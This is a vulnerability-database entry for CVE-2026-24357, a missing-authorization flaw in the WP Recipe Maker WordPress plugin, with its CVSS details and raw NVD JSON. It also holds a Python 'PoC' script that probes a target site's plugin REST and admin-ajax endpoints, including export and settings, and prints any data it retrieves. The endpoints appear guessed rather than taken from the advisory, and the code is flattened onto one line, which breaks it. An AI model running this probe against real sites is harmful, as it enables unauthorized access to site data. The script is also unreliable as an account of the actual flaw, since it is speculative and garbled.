Security Vulnerability Report
中文
CVE-2026-24357 CVSS 4.3 MEDIUM

CVE-2026-24357

Published: 2026-01-22 17:16:39
Last Modified: 2026-04-28 03:16:03

Description

Missing Authorization vulnerability in Brecht WP Recipe Maker wp-recipe-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Recipe Maker: from n/a through <= 10.2.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Recipe Maker <= 10.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24357 PoC - WP Recipe Maker Broken Access Control # Target: WordPress site with WP Recipe Maker plugin <= 10.2.4 def exploit_wp_recipe_maker(target_url, cookie=None): """ Exploit Missing Authorization in WP Recipe Maker This PoC demonstrates accessing privileged endpoints without proper authentication """ # Target endpoints that may be vulnerable endpoints = [ '/wp-json/wp-recipe-maker/v1/recipes', '/wp-json/wp-recipe-maker/v1/export', '/wp-json/wp-recipe-maker/v1/settings', '/wp-admin/admin-ajax.php?action=wprm_export_recipes', '/wp-admin/admin-ajax.php?action=wprm_get_recipe_data' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } if cookie: headers['Cookie'] = cookie print(f'[*] Testing target: {target_url}') print(f'[*] CVSS Score: 4.3 | Type: Missing Authorization') print('-' * 50) for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10) print(f'\n[+] Endpoint: {endpoint}') print(f' Status: {response.status_code}') if response.status_code == 200: print(f' [VULNERABLE] Response length: {len(response.text)} bytes') if 'json' in response.headers.get('Content-Type', ''): print(f' Data preview: {response.text[:200]}...') elif response.status_code == 401 or response.status_code == 403: print(f' [PROTECTED] Access denied') except requests.RequestException as e: print(f' [ERROR] {str(e)}') print('\n[*] PoC execution completed') print('[*] Note: This vulnerability allows low-privilege users to access admin functions') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-24357.py <target_url> [cookie]') print('Example: python cve-2026-24357.py https://example.com') sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] if len(sys.argv) > 2 else None exploit_wp_recipe_maker(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24357", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:39.427", "lastModified": "2026-04-28T03:16:03.007", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Brecht WP Recipe Maker wp-recipe-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Recipe Maker: from n/a through <= 10.2.4."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Brecht WP Recipe Maker wp-recipe-maker permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Recipe Maker: desde n/a hasta &lt;= 10.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-recipe-maker/vulnerability/wordpress-wp-recipe-maker-plugin-10-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}